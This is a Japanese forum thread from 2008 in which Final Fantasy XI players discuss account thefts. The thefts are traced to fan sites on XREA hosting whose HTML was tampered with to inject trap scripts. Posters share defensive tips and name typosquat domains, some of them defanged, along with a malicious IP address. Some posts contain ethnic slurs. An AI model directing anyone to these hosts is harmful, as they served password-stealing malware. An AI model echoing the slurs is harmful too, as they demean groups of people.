431 名前:既にその名前は使われています:2008/08/09(土) 17:13:58 ID:u6Fwnsea
垢ハックして外人になりすましてるやつがいるぞ

432 名前:既にその名前は使われています:2008/08/09(土) 17:15:12 ID:WKVNyc07
>>430
pol.exeがキーロガーの様な振る舞いをしていて、それに反応してると言う
認識で良い訳ですよね?


433 名前:既にその名前は使われています:2008/08/09(土) 17:18:08 ID:PfsGt+nH
>>425
その手のミスタイプや見間違い狙った罠ドメインは山ほどあるからシャレにならねーんだよ

実際にあった例は
playenline、play0nlnie、playon1ine、playonlanei、playonlinenc、playonlino、playonlnie
最近じゃyoutube狙った
www■youturebe■comやらwww■youtubles■net
なんかがある

434 名前:既にその名前は使われています:2008/08/09(土) 17:19:10 ID:Ef2b8rFw
 逮捕記念age

435 名前:既にその名前は使われています:2008/08/09(土) 17:21:24 ID:S8wuFaOd
ワールド移転されて謎の外人LSに放り込まれてた
Hiじゃねーよカス!!!!!!!!!1111


436 名前:既にその名前は使われています:2008/08/09(土) 17:23:31 ID:zznGrXD7
いくつかのFFブログに中華スクリプトが見つかった

週末確実狙われてるな、とりあえずブログ系も自己責任で見ろだな

437 名前:既にその名前は使われています:2008/08/09(土) 17:24:33 ID:SWZ6C4bE
>>436
そういうときはどこのブログが教えてくれよw

438 名前:既にその名前は使われています:2008/08/09(土) 17:26:03 ID:ElInmB/H
>>435
         /|
.        |/__
       ヽ| l l│<ハーイ
       ┷┷┷

439 名前:既にその名前は使われています:2008/08/09(土) 17:32:17 ID:3zbSgyla
>>432
yes

440 名前:既にその名前は使われています:2008/08/09(土) 17:32:22 ID:W8h0gMNp
PCでFF遣るのは字札行為だぞ?

441 名前:既にその名前は使われています:2008/08/09(土) 18:13:45 ID:ApaqC/qE
>>438
わらたんでage

いや、435にはすまぬwww




442 名前:既にその名前は使われています:2008/08/09(土) 18:36:27 ID:73rJmmal
業者しねよ

443 名前:既にその名前は使われています:2008/08/09(土) 21:24:39 ID:eUF4xW0M
鯖番がばらけている事、挿入位置には法則性がなさげな事、XREAのみである事等から
サーバがクラックされている可能性が高い気がする。また、『外部委託』でなんちゃらなんだろうか。

前の件も含め、これでほぼ無料鯖サービスは廃止になるんじゃないかねぇ・・・(常識があればそうするだろうな)。

444 名前:既にその名前は使われています:2008/08/09(土) 21:44:48 ID:SWZ6C4bE
>>443
今回やられてるところは無料のとこ?

445 名前:既にその名前は使われています:2008/08/09(土) 21:47:51 ID:4yOU/WQJ
すいません、ちょっとお聞きします。
pcでffやっているんですが、さっき有名攻略サイト(エレ○ン)から忍者サイトへリンクした際、
ウィルスソフトに「ネット詐欺の可能性があります」とでたので、ブロックする と選択しました。
で、いまログインしている状態なんですが、ログアウトして大丈夫でしょうか?
身近でアカウントハックがあったので不安なんです…教えてください、よろしくお願いします。

446 名前:既にその名前は使われています:2008/08/09(土) 21:50:27 ID:SWZ6C4bE
>>445
・ウイルスソフトの名前
・リンク先のURL(ただし誤クリックできないようにhttpをhxxpにするなどの工夫をする)
ここらへんを教えてくれ
ま、ブロックしてるなら平気だとは思うけど

447 名前:既にその名前は使われています:2008/08/09(土) 21:56:06 ID:PfsGt+nH
>>445
とりあえず>>389のサイトが8月頭から直接改竄を受けて、
危険サイトへ強制アクセスさせる罠が仕込まれた状態にある

パス盗まれてりゃそいつで後出しログインされれば強制的に落とされるんだから
さっさとログアウトしてPC内のウィルスチェックなりなんなりしたほうがいいと思うが

448 名前:既にその名前は使われています:2008/08/09(土) 21:56:15 ID:u6Fwnsea
忍者のテンプレサイト改ざんされてたぞ

449 名前:既にその名前は使われています:2008/08/09(土) 21:57:28 ID:PfsGt+nH
>>446
エレメンでリンクされてる忍者サイトっつったら激しく忍者テンプレくらいしかないぞう

450 名前:既にその名前は使われています:2008/08/09(土) 21:58:03 ID:g6Cz8mCn
汚いな業者さすが汚い

451 名前:既にその名前は使われています:2008/08/09(土) 21:58:52 ID:SWZ6C4bE
>>449
ああ「FF11の忍者」のサイトってことか
ninja toolsのところかと思ってた

452 名前:既にその名前は使われています:2008/08/09(土) 22:02:15 ID:YvY8FaYM
戦術板の忍者スレの方でも話題が出ているね。前の詩人スレの時と同様じゃなかろうか。

453 名前:既にその名前は使われています:2008/08/09(土) 22:06:33 ID:PfsGt+nH
>>452
ここ100レスほどその話題がメインでござるよ

レン鯖板のXREAスレでも話題沸騰中


454 名前:既にその名前は使われています:2008/08/09(土) 22:12:45 ID:PyaJzTNi
また被害が拡大するのかよw
■eはユーザーに脅しかけたり無関係の一般人と裁判してる暇があったら
さっさと業者潰せよ

455 名前:既にその名前は使われています:2008/08/09(土) 22:12:46 ID:AS/+arXS
黒スレと詩人スレと忍者スレのテンプレだね

456 名前:既にその名前は使われています:2008/08/09(土) 22:17:14 ID:AS/+arXS
>>453
話題沸騰というか、ここと掛け持ちの人しか騒いでない気がする

457 名前:既にその名前は使われています:2008/08/09(土) 22:26:13 ID:SBVfiTnC
まあ関係のない人には他人がパス抜かれたってどうでもいいんだろ
自分がウイルス撒き散らしていようとも

458 名前:既にその名前は使われています:2008/08/09(土) 22:40:30 ID:W8h0gMNp
ゼリアとエフシーは今も昔もやばやばです

459 名前:既にその名前は使われています:2008/08/09(土) 22:43:37 ID:4yOU/WQJ
ありがとうございます。
まさにそのテンプレサイトです…。
とりあえずウィルスチェックしてみますm(__)m

460 名前:既にその名前は使われています:2008/08/09(土) 22:44:39 ID:eUF4xW0M
>>444
XREAは基本的に"無料鯖"のみというアナウンス。いやお金を払って広告をなくすプランもあるが
これはいわゆる『広告免除サービス(とおまけにサーバ容量増加とか)』という位置づけとされ、
一般に言う『有料サーバ』とは一線を画すのだと。デジロック(XREAの運営者)真正の有料サーバは
CoreServerって事だろうね。

ただ、昔は無料専用サーバと広告免除サーバが分かれていた気配もあったけど、無料でもすぐに
広告免除できるし、広告免除期間が切れれば無料アカウント扱いになるから、区別することは
実質意味はないかと。

ああ、もうひとつクラックの推理の根拠。同じ鯖番内でもクラックされているサイトとその気配が無い
サイトが存在する事。鯖上ファイルが改ざんされていたから為、先日話題になったさくらの
ARP spoofinでは無いだろう。
多分、クラック経路は、外部委託のためのシステムに穴があったとかだろう。

…先日CoreServer契約したばっかりなんだがな。
いや、今抱いている感情を口にするのは憚られるので、やめておこう。ああ、もう・・・。

461 名前:既にその名前は使われています:2008/08/09(土) 22:52:51 ID:W8h0gMNp
「不正アクセス専用チャットサポート」はシステムメンテナンス作業の為、2008年8月11日(月)を臨時休業とさせていただきます。
ご不便をおかけいたしますが、不正アクセスに関するお問い合わせは翌日以降にお申し込みくださいますようお願いいたします。
「不正アクセス専用チャットサポート」はシステムメンテナンス作業の為、2008年8月11日(月)を臨時休業とさせていただきます。
ご不便をおかけいたしますが、不正アクセスに関するお問い合わせは翌日以降にお申し込みくださいますようお願いいたします。


462 名前:既にその名前は使われています:2008/08/10(日) 00:10:42 ID:szcGgUNB
また改ざんされてる別のサイトでたのか。
手口は前回同様、広告サーバクラック?

463 名前:既にその名前は使われています:2008/08/10(日) 00:12:51 ID:szcGgUNB
PCに対してわりと知識もってそうな奴でも垢ハックされていた。
沈静化の兆しが見えないが…。

464 名前:既にその名前は使われています:2008/08/10(日) 00:12:56 ID:YySDbD9n
>>462
直接ページを改竄
ジョブテンプレ系はしばらく見ないもしくは自己責任での閲覧推奨

465 名前:既にその名前は使われています:2008/08/10(日) 00:19:07 ID:0ek0HBKp
>>462
サイトのhtmlソースを直接改竄されている
(つまり管理者以外いじりようがないはずの部分が改変されている)
しかもフレーム形式の場合、ページが切り替わっても常時表示される部分を
狙って罠スクリプトを潜らせている

さらに対象がXREA限定となるとまたXREAに何らかのでっかい「穴」が開いて
そこ経由でやられてるんじゃないのかと想定
広告の時は広告サーバーの管理パスが外部委託先から第三者に漏れたのが原因だったそうだけど
漏れたのはひょっとしてそれだけじゃなかったんじゃないのかい?

466 名前:既にその名前は使われています:2008/08/10(日) 00:25:18 ID:hnEx20lg
今のところ見る分には 最新のFlashPlayer JSオフ PG2で香港ブロックあたりで対策できそうです。
けどどのルートで改ざんされたのか不明なので 今後同じ手法でゼロデイ使われたら脅威ですねぇ。
XREAに移ったばかりなのにorz
発覚してるのは4サイトは FF XREAで検索すると上位に来るところばかりなので
そういうところが狙われたのか 
時期的に帰省とか旅行してる人も多くて 発見が遅れてるのか気になるところです。
もし ピンポイントでハックできるなら リネ資料室さんなんか真っ先に狙われそうだけどRBLしてるんでしたっけか


467 名前:既にその名前は使われています:2008/08/10(日) 00:28:05 ID:YySDbD9n
そういやマップガイドに連絡付けようとおもったら連絡先がどこにもないヨー

468 名前:既にその名前は使われています:2008/08/10(日) 00:29:55 ID:szcGgUNB
直接サイトのっとったわけか、ありがとう。XREAの無料サーバだめじゃん;

469 名前:既にその名前は使われています:2008/08/10(日) 00:31:08 ID:hnEx20lg
ああ 途中で送ってしまった。
クッキーのサーチしてるっぽいのも気になった
広告鯖クラックしたときに仕込をしてたか ネタ温存してたかって感じなのかなぁ。
こまったにゃー;; 

470 名前:既にその名前は使われています:2008/08/10(日) 00:33:07 ID:0ek0HBKp
>>463
今年に入ってから不正アクセス犯罪のタゲがどんどんオンラインゲーム関連に向かってきている
「おいしい餌場」として認識されてるから新しい手段が惜しみなく投下されているし、
月ごとの新種トロイ検出数では4月くらいからオンラインゲーム関連のものが上位独占。
手口は巧妙化かつ攻撃は激化してるのに、アンチウィルスのベンダーの対応は遅いし
「たかがゲーム」だからニュース的にも問題にならない。ユーザー間の危機意識も薄い。
こんなんで沈静化するわけがないっす

>>468
こないだのは「無料サービスに表示義務がある」広告が原因だったから「無料だめじゃん」だったけど
今回は改竄の原因がはっきりしない以上有料だからセフセフとも言えない状況

471 名前:既にその名前は使われています:2008/08/10(日) 00:41:58 ID:9CVRfG4G
被害拡大させる気か?

「不正アクセス専用チャットサポート」臨時休業のお知らせ(8/11)
http://www.playonline.com/ff11/polnews/news13913.shtml

2008年8月11日(月)を臨時休業とさせていただきます。


不正アクセスも電話って事かな?繋がらなそう

472 名前:既にその名前は使われています:2008/08/10(日) 00:47:41 ID:IKGpaKiz
■e<ワールド移転にキャラ作成。業者さまのおかげで休業中も稼がせていただいてます^^v

473 名前:既にその名前は使われています:2008/08/10(日) 00:52:45 ID:qNKMSOcR
業者マジで氏ね!!!!!!!!!! ああ、垢ハックされますた。

474 名前:既にその名前は使われています:2008/08/10(日) 00:53:59 ID:hnEx20lg
そなんですよねー。
大事なことなので重複ですが書いておきます。
XREAには 有料サーバはないのです。
広告免除サービス=XREA+があるだけで 広告のあるサイトもXREA+のサイトも同じサーバに混在してます。
だから今回みたいな場合 広告がないから安心とは言えないんですよ。
広告が原因ならもっと多数のサイトが感染してるはずなんです。
FF XREAでぐぐった上位100くらいのサイトをNOSCRIPTが1039045744をはじくかで確認してみたんですけど
現状確認できなかったんですよね。
ネット便利さんは独自ドメインだし...
しかも バリュードメインでドメイン買えばもれなく無料サーバが使える仕様。
xrea.comドメインじゃなくても XREAサーバ上にあるサイトは大量にあるんです。

475 名前:既にその名前は使われています:2008/08/10(日) 01:03:26 ID:zMvjIhcW
>>468
サイトならまだ良い、おそらくサーバがのっとられているんじゃないかという疑い。
もっと悪い状況。

いま報告されているサイトでは共通に使われているCGIとかが見当たらない。いや、
あるのかもしれないが、だとしたって、既出例はサイトの分野が偏っている。CGIの脆弱性なら
基本的に満遍なく分散するはずなのに。

デジロックの外部委託員は多分、個人ユーザーのサーバ領域にアクセス及び操作できる筈
(以前対応を受けたときにそういう感触を受けた)。また、各サイトのコンパネにもアクセスできる
模様。つまり、外部委託員の為のシステムがやられたのであれば、おそらく確実に現在の
状況は実現できる。

だから、同じデジロック運営のXREAだけでなくCoreServerも下手するとその危険性があるかもしれない。



476 名前:既にその名前は使われています:2008/08/10(日) 03:13:24 ID:4ln6dZHl
             _,,..r'''""~~`''ー-.、
            ,,.r,:-‐'''"""~~`ヽ、:;:;:\
           r"r          ゝ、:;:ヽ
   r‐-、   ,...,, |;;;;|       ,,.-‐-:、 ヾ;:;ゝ
   :i!  i!  |: : i! ヾ| r'"~~` :;: ::;",,-‐‐-  `r'^!
    !  i!.  |  ;| l|  ''"~~   、      i' |
     i! ヽ |  | |    ,.:'"   、ヽ、   !,ノ
    ゝ  `-!  :| i!  .:;: '~~ー~~'" ゙ヾ : : ::|
   r'"~`ヾ、   i! i!   ,,-ェェI二エフフ : : :::ノ~|`T <イエーイ、前屈見てるー?
  ,.ゝ、  r'""`ヽ、i! `:、   ー - '" :: : :/ ,/
  !、  `ヽ、ー、   ヽ‐''"`ヾ、.....,,,,_,,,,.-‐'",..-'"
   | \ i:" )     |   ~`'''ー---―''"~
   ヽ `'"     ノ

477 名前:既にその名前は使われています:2008/08/10(日) 03:38:19 ID:ics7zMgF
つーかいつまで犯罪者野放しにしておくんだよ
おりんぴっくとかやってる場合じゃないだろクソ天安門

478 名前:既にその名前は使われています:2008/08/10(日) 03:44:11 ID:wIlg6aj9
しかし恐ろしいほどテレビで話題にしないな
そりゃ無知な層がPC買わなくなるだろうしな

479 名前:既にその名前は使われています:2008/08/10(日) 03:45:57 ID:0/52jFiX
たかがゲーム、ですし

480 名前:既にその名前は使われています:2008/08/10(日) 03:46:11 ID:CktaUYjG
要するに、今時点のFF関連サイトで危ないのは何処なんだ?
会話が専門的すぎてわからねーよ

・エレメン
・エフメモ
・ヴァナモン(ブログじゃないほう)
・Air's Museum
・ゴブリ
・FFレシピ

この辺の有名サイトで教えてくれ

481 名前:既にその名前は使われています:2008/08/10(日) 03:47:45 ID:s0/RLGdA
FFの配信でLSメンが目の前でアカウントハック受けてる状況を見たがひどかったな…
一応アカウント停止要請までは配信者が代理で申請したけど処理が終わった時は既に宅配終わった後だった
他人事じゃないなって実感したわ

482 名前:既にその名前は使われています:2008/08/10(日) 03:47:45 ID:stCy11L1
一番危ないのは自分で学ぼうという気の無い君の頭の中かな

483 名前:既にその名前は使われています:2008/08/10(日) 03:48:40 ID:bXR/r/++
先日再発行してもらったパスがもう使えなくなってた
一度もそのパスでPCからログインしていないからハッキングはありえないんだが
即パス変更しないといけなかったのかしら

484 名前:既にその名前は使われています:2008/08/10(日) 03:50:16 ID:CktaUYjG
ID:stCy11L1
何こいつ。自分で悦に浸ってるだけかよ。死ねよ糞業者が

485 名前:既にその名前は使われています:2008/08/10(日) 03:52:14 ID:5KsfBGvi
夏だなぁ

486 名前:既にその名前は使われています:2008/08/10(日) 03:53:21 ID:0/52jFiX
>>480
それがわかりゃ苦労しねー。
「危ないかもしれない、だけど自分はがんばって対策したから見ても大丈夫だろう」と
信じて閲覧してんだよ。
苦労しないでできる一番楽な対策は「Webみない」事しかない。

487 名前:既にその名前は使われています:2008/08/10(日) 03:55:31 ID:stCy11L1
夏だねぇ

488 名前:既にその名前は使われています:2008/08/10(日) 04:03:43 ID:w7DNmdaI
マスゴミに教えてやろうぜ

489 名前:既にその名前は使われています:2008/08/10(日) 04:04:42 ID:szcGgUNB
>>479
その言葉ってよく出来た隠れ蓑だよな。きれいに本質隠してるような気がする。
>>480
・エレメン…今の所平気。ただしここからリンク張られてるサイトやwikiで管理放棄気味の場所は注意。
・エフメモ…同上。
・ヴァナモン…同上。ブログは閉鎖済み。
・Air's Museum…同上。
・ゴブリ…同上。
・FFレシピ…サイト権利を買ったRMT業者が運営してる。白地図本舗も同様。
とりあえずPC2台目用意して、それでネットやるしか絶対といえない。

地図サイトとしていまハッキングされてるサイト使ってたんだけれど
ホント困るよなぁ。まぁ地図ならこのサイトにも載ってるけれど。
ttp://ff11db.sakura.ne.jp/database/top/index_map.html

490 名前:既にその名前は使われています:2008/08/10(日) 04:26:27 ID:4AoqWpzf
htmlソースを直接改竄されてる時点でもうどこにも安全だといえるサイトは無い気がするがな

自分に知識が無いorウイルス対策などしてないなら「FF」に関係するような所は見るなとしかいえない

491 名前:既にその名前は使われています:2008/08/10(日) 04:28:40 ID:dNBfjtk8
>>482
さすがわかってる人は言葉に重みがありますね(笑)

俺の周りでもここ数日で5人もハックされてた
うち1人は普段PS2でやってるのに、たまたま友達の家でログインした時の
パスを抜かれてハックされたみたいで、悔やんでも悔やみきれんというか


492 名前:既にその名前は使われています:2008/08/10(日) 04:33:22 ID:Pw/UC7H7
ちょっと相談。
PG2いれてからいままではじいてきたのは韓国とかだけだったんだが
さっき履歴をみたら、金曜にリネ研究室さんの「MMOトロイ」のうちにある
pcutw69.64.155.132のとこに送信しようとしてブロックされてた履歴があった。
で、スキャンとかしたんだけど何も出てこない。
PC内に既にウィルスが入ってた可能性の他に
そのとき閲覧してたサイトに問題がある可能性もあると思うんだが
何のサイトみてたか思いだせない。
FF関連だと用語集とwikiぐらいしか普段は見ないんだが
最近は調度品グラ見たくて検索したかなとかいう記憶がある。

特定の日時にどのサイト見てたかとか調べる方法ありますか?

493 名前:既にその名前は使われています:2008/08/10(日) 04:34:43 ID:9g4tHL/n
やべぇ地図サイトってFF11・マップガイドのことかよ・・・
やっべーブログで「おすすめ^^」とか紹介しちまった・・・

494 名前:既にその名前は使われています:2008/08/10(日) 04:38:09 ID:szcGgUNB
>>490
そのとおりだよな…。数ヶ月前迄は何を大げさなwとか本当に思っていた。
ノートン素通りの時点で一般人ついていけない、もうダメだと思う。
あげくFF関係ないサイトにまで罠仕込みとかさ。

495 名前:既にその名前は使われています:2008/08/10(日) 04:38:56 ID:4AoqWpzf
>>493
即消しておけ

便利ガイド、マップガイドともにウイルス常駐
管理人とは連絡方法が無いみたいだからしばらくばら撒き続けるぞ

496 名前:既にその名前は使われています:2008/08/10(日) 04:40:46 ID:HxpB07+a
>>492
つかってるブラウザが何かによるけど、履歴みれたりしない?

497 名前:既にその名前は使われています:2008/08/10(日) 04:52:15 ID:Pw/UC7H7
>496
書き忘れた、ごめん。火狐で、履歴欄から最後の表示日時だせるね、ありがとう

498 名前:既にその名前は使われています:2008/08/10(日) 04:56:39 ID:Pw/UC7H7
で、探してみたら、FFと「まったく」関係のない趣味の携帯サイト?で
69.64.155.132をブロックしてるんだがww

499 名前:既にその名前は使われています:2008/08/10(日) 04:57:34 ID:Zto8vCIZ
広告じゃねーの?

500 名前:既にその名前は使われています:2008/08/10(日) 04:58:20 ID:Qny/eMLS
まぁついでに、IEだと「表示→エクスプローラーバー→履歴」で出ます

501 名前:既にその名前は使われています:2008/08/10(日) 05:07:14 ID:Pw/UC7H7
色々ありがとう。
広告ではなくてweb素材?を提供してるサイトっぽいんだが
なんでそこがMMOトロイと関係あるのかさっぱりわからん。

502 名前:既にその名前は使われています:2008/08/10(日) 05:20:57 ID:lbYwARaR
広告Flashかiframeにでも仕込まれてたんだろ、って事だと思うが
Firefox使ってるならNoScriptとFlashblock入れてないってことは無いか。

プライバシ情報なんか終了時全消ししてたが・・・
履歴くらいは残した方が便利かもしれんな。

503 名前:既にその名前は使われています:2008/08/10(日) 05:33:07 ID:Pw/UC7H7
NoScriptは入れてるー。
www★yamada03★org
なんだが、FFと関係なさそうだよなあ。

指定ドメイン => 「 yamada03★org 」
  取得ホスト名 => yamada03★org
  取得IPアドレス=>  69.64.155.132 (IPv4)

69.64.155.132がMMOトロイに指定されてる。
ブロック解除するのこわくて該当サイトみれないんだが、何なんだ。

504 名前:既にその名前は使われています:2008/08/10(日) 05:34:19 ID:bXR/r/++
携帯からは見れないの?

505 名前:既にその名前は使われています:2008/08/10(日) 05:44:11 ID:Pw/UC7H7
そうっぽい。

506 名前:既にその名前は使われています:2008/08/10(日) 06:02:25 ID:YnMXnd5K
X激しく忍者 百三拾八ノ巻X
http://yy28.kakiko.com/test/read.cgi/ff11jobjobplus/1215269497/802
802 名前:天麩羅サイトの人 ◆iyCbVNINJA :08/08/10 02:15:24 ID:PSxsU/u/
とりあえず対処。


>>389
XREA 1039045744:88 の確認されたサイト

FF11・マップガイド(ネット便利)フッターテーブル内 
黒魔協会:xml宣言の前

吟遊詩人テンプレ:メニュー ヘッダー 8/7 21:40対策済み 
忍者スレテンプレ:メニュー </body>と</html>の間 8/10 2:15対策済み


507 名前:既にその名前は使われています:2008/08/10(日) 06:40:01 ID:a/h7Gq9M
>>491
ここまで危険な状況だと、
友達の家、ネットカフェ、等でプレイしたら、家に帰って即パスワード変更は絶対必要だな。
たとえWEB見ないPCでプレイしてたとしても、1月ごとくらいにパスワード変えたいかも。

最悪の場合、今後ネットワーク内のどこかのPCでFF関連の感染サイト踏んだ場合、
同じグローバルアドレスにぶらさがってる家庭内LANのPC総当りで狙われる可能性が
無いとはいえない気が・・・
この世界、ピンポイントで狙われたら終わりってのは確かだしな;

508 名前:既にその名前は使われています:2008/08/10(日) 06:47:26 ID:hXL3uta5
マップガイド、いつから改竄されていたんでしょうか 
ある程度目安で分かる方いますか・・?
8/1〜3辺りで見てしまいました・・・
その時はPG2無反応だったけど、うちのPG2は今まで反応したことが無くて不安です(⊃Д`)

509 名前:既にその名前は使われています:2008/08/10(日) 06:52:17 ID:4GmPAcit
>>508

手遅れになる前になにかしら手をうったほうがいいぜ

510 名前:既にその名前は使われています:2008/08/10(日) 06:55:48 ID:Zto8vCIZ
スクリプト切ってたなら感染してないんだからPG反応しなくて当然じゃないの?
まぁ、↑これだけで100%対策しきれてるとは言えないらしいが


511 名前:既にその名前は使われています:2008/08/10(日) 07:51:33 ID:m19NOlYw
盆前になにかしてくるだろうと思ってたけど、やっぱり来てたか



512 名前:既にその名前は使われています:2008/08/10(日) 08:00:11 ID:088l2Uxn
ps2でオンできないんだけどオイらだけ?


513 名前:既にその名前は使われています:2008/08/10(日) 08:16:10 ID:kQDk+RIP
>>512
まず100Vのコンセントを用意しろ

514 名前:既にその名前は使われています:2008/08/10(日) 09:44:02 ID:0ek0HBKp
>>503
69.64.155.132は中華の危険ドメインmakgcat■comのグループ、pcutw■comと同一IP
そっちに反応したんじゃないのかい

「web素材?を提供してるサイトっぽい」っていうのは www■yamada03■orgにアクセスしたときに表示される
「welcome to yamada03■org」表示の下の「materiel〜」を指してるんだと思うんだけど
この手のおねーちゃんつき画面はドメイン失効したか失効→ドメイン名買い取られの対策として偽装indexとして貼ってるか
そのあたりで表示されるもんなのでサイトの中身とは全く関係無い

515 名前:既にその名前は使われています:2008/08/10(日) 10:26:42 ID:Pw/UC7H7
>514
わざわざありがとう

516 名前:既にその名前は使われています:2008/08/10(日) 11:21:49 ID:MqepF7xe
もうユーザーが対処できる状態じゃないじゃんかw
pcこわくて使えないんですが。どこ開いてもあやしいじゃんかよ

517 名前:既にその名前は使われています:2008/08/10(日) 11:35:20 ID:0/52jFiX
>>516
誰に言ってるの?
スレの人たちにいってもお門違いなんだけど。

518 名前:既にその名前は使われています:2008/08/10(日) 11:46:12 ID:ZwDS9S5C
思考停止に陥るなら、PCを使わない方が自分のためでもあるし、他人の為でもある。

519 名前:既にその名前は使われています:2008/08/10(日) 11:49:28 ID:pfUqWA94
ネ実にいるような奴は目くそ鼻くそwwwwwwwwwwwwwwwww

520 名前:既にその名前は使われています:2008/08/10(日) 11:52:36 ID:7teE2Z8P
単に愚痴を言っただけでここまでいわれるか
そこまで人間不信に陥らないと生きていけないわけ?社交辞令みたいなもんだよ

521 名前:既にその名前は使われています:2008/08/10(日) 12:15:20 ID:eMxppDxm
チョンゲーのが対応良いな

522 名前:既にその名前は使われています:2008/08/10(日) 12:21:06 ID:eMxppDxm
俺なんて2ヶ月も巻き戻ったからな
ハック時にLV75だったキャラが35になってたわ
流石にやる気なくなったぜ。クレカからWEBマネーに変更したし今月で引退予定

523 名前:既にその名前は使われています:2008/08/10(日) 12:43:53 ID:iM+nD6DF
2ヶ月は酷いなw
■は業者の垢売りに援護射撃してるようなものだな

524 名前:既にその名前は使われています:2008/08/10(日) 13:02:30 ID:kQDk+RIP
対応遅いのはそれだけ被害者が多いってことなのかなぁ?

525 名前:既にその名前は使われています:2008/08/10(日) 13:03:36 ID:rTMJAFs0
そうだよw

526 名前:既にその名前は使われています:2008/08/10(日) 13:10:36 ID:sPPxPB21
これだけ多いと内部から漏れてる可能性もかなり高いな

527 名前:既にその名前は使われています:2008/08/10(日) 13:11:25 ID:vKl1bT0w
>「たかがゲーム」だからニュース的にも問題にならない。
>ユーザー間の危機意識も薄い。

なんという濡れ手に粟。
初期のオレオレ詐欺並に儲かりそうだ。

528 名前:既にその名前は使われています:2008/08/10(日) 13:12:30 ID:rZ5ycPsk
被害額については、月額料金の1500円くらいってことだからなw
ニュースにも何にもなるはずがないw

529 名前:既にその名前は使われています:2008/08/10(日) 13:12:36 ID:YySDbD9n
この前までは5分に一回パスが送信されてきてたっていうからな
中身に差異はあれど、他人の財布が5分に一回舞い込んできてるって考えると酷いもんだ

530 名前:既にその名前は使われています:2008/08/10(日) 13:17:10 ID:8dByw3ZG
>>527
RMT自体はニュースになったし、不正アクセスもニュースになる事はあるし
盗用クレカとRMTのロンダリングの恐れとかもニュースになっているのにな。
やはり根幹に中国が絡んでいるからだろうか?

531 名前:既にその名前は使われています:2008/08/10(日) 13:22:01 ID:o7Oz2/IQ
>>528
クレカ支払いだと勝手に鯖移動もさせられてるらしいよ。
フルに新キャラ作られて不正な行為「すり抜け」「RMの受け渡し」に使われる事も多いらしい。
クレカ払いの奴は被害額5000円以上と見ておいた方がいい

532 名前:既にその名前は使われています:2008/08/10(日) 13:32:22 ID:p89+26ck
俺はクレカだったけど、鯖移動も削除、新キャラ作成等、無しだったよ。
7/5の大漁時だったから、とっとと次垢に行ったのかもね。
人、神、四神印章、裏貨幣、等も放置だったし。
担当?する人によるのかも。

533 名前:532:2008/08/10(日) 13:38:57 ID:p89+26ck
追記
ハックされて、ログインされた時、フレが気づいて連絡くれて、別垢(別PC)や
リアルフレ等複数で、Tell送りまくったり、宅配前で、トレードしたりして
邪魔しまくってたからかも。

534 名前:既にその名前は使われています:2008/08/10(日) 13:56:08 ID:oSAxQvIp
>>532
今は根こそぎ持って行かれるよ。その為に奴等は土曜まで何もせずに潜伏してるんだから。


535 名前:既にその名前は使われています:2008/08/10(日) 13:58:59 ID:HvN/kX/S
RMTやマネーロンダリングと絡めて、大々的にどこか特集してくれないかな。
どうせなら■へ突撃インタビューも含めて。

正直、このくらいないとまともに動いてくれなそう。

536 名前:既にその名前は使われています:2008/08/10(日) 14:06:31 ID:ZjhbzfYJ
垢ハックに便乗して、持ち逃げするあふぉも増えてるからなあ
わざわざ専用スレまで立てたバハ鯖のKeycleとかも、結局垢ハック嘘だったし・・・
ここでハックされた報告が全て嘘だとは思わんが、鵜呑みにするのもどうかと思う

537 名前:既にその名前は使われています:2008/08/10(日) 14:12:01 ID:QPDXPAsY
マップガイドをソースチェッカーオンラインで確認しても問題ないんだけど
実際開いてみると例のウイルスサイトに繋ごうとするんだよね
どんな仕組みだろ

538 名前:既にその名前は使われています:2008/08/10(日) 14:17:28 ID:YySDbD9n
>>537
ソースチェッカーで見たときのソース欄を見る限り、
タグの関係か何かでどうもページの途中でチェックを終えてるっぽい
問題のスクリプトは一番下のほうにあるからチェックできてないね。
別のソースチェッカーで見たらばっちり出てくる

539 名前:既にその名前は使われています:2008/08/10(日) 14:20:55 ID:QPDXPAsY
そうだったのか
HTMLを直接編集されるってのは恐ろしいな
XREAセキュリティ甘すぎるなぁ

540 名前:既にその名前は使われています:2008/08/10(日) 16:24:52 ID:yBJC8U5g
にじうらに盛んにxreaのURL貼ってる奴が居るんだが
やっぱり罠なのか?

541 名前:既にその名前は使われています:2008/08/10(日) 16:33:18 ID:zFxUwJHX
age

542 名前:既にその名前は使われています:2008/08/10(日) 16:46:54 ID:WI8QwvVt
>>540
張られたURL踏むのは自己責任じゃないのか?
きょうびテンプレサイトだって安心して踏めないけどな。

543 名前:既にその名前は使われています:2008/08/10(日) 16:56:14 ID:B25VcJ+i
自分の時はまったく見なかったけど、FFAHを見る限り、怪しい高額アイテムを
売ってる人は後を絶たないね。

544 名前:既にその名前は使われています:2008/08/10(日) 16:58:42 ID:UwBaGP17
自己責任ではあるがいつ新種が出るか分からんし
鯖に穴があるなら塞いでほしい
泥棒業者も便乗愉快犯もシネ

545 名前:既にその名前は使われています:2008/08/10(日) 17:03:15 ID:Zto8vCIZ
競売だけじゃなく乗っ取ったキャラで堂々とシャウトで物売ったり印章消化しようとしてる奴いるぞー


546 名前:既にその名前は使われています:2008/08/10(日) 17:43:30 ID:V6NeZhnb
>>545
何をいまさら
釣りスキル100だから寝釣りに使われたぞ

547 名前:既にその名前は使われています:2008/08/10(日) 17:45:22 ID:YySDbD9n
>>546
ありゃー、垢BANとかは食らってなかった?

548 名前:既にその名前は使われています:2008/08/10(日) 18:12:58 ID:h3bRhtYR
ワープで使われるキャラのほとんどが垢ハックで被害にあった奴のキャラ
中華は新アカウントでワープを繰り返してるわけではないのでBANされても痛くも痒くもない。何度でも繰り返す

549 名前:既にその名前は使われています:2008/08/10(日) 18:51:19 ID:GRED31jJ
痛くも痒くも無いので通報しないで;;まで読んだ
お断りします

550 名前:既にその名前は使われています:2008/08/10(日) 19:10:51 ID:WI8QwvVt
>>548
要は啓蒙することで業者を少しでも締め出すことができる訳だ。
お互い、肩にチカラ入らない程度に頑張ろうや。

551 名前:既にその名前は使われています:2008/08/10(日) 20:05:45 ID:plJUV6eZ
いま新しい手口が流行りかかってるんだからあげあげで行かないとですよ

552 名前:既にその名前は使われています:2008/08/10(日) 20:11:43 ID:zFxUwJHX
垢ハックにおびえながらプレイするんじゃなくて普通にプレイできる状況が懐かしい

553 名前:既にその名前は使われています:2008/08/10(日) 20:12:19 ID:4AoqWpzf
しかし、ハックされる奴はセキュリティーざるだわ、ここは見てないわだからな

ハックされてから来るパターンばっかりじゃない?
で、来ていうのが「クリーンインストールって絶対しないといけないんですか?」だしな
そりゃ減らない罠



554 名前:既にその名前は使われています:2008/08/10(日) 20:19:55 ID:CQZ/Sw2P
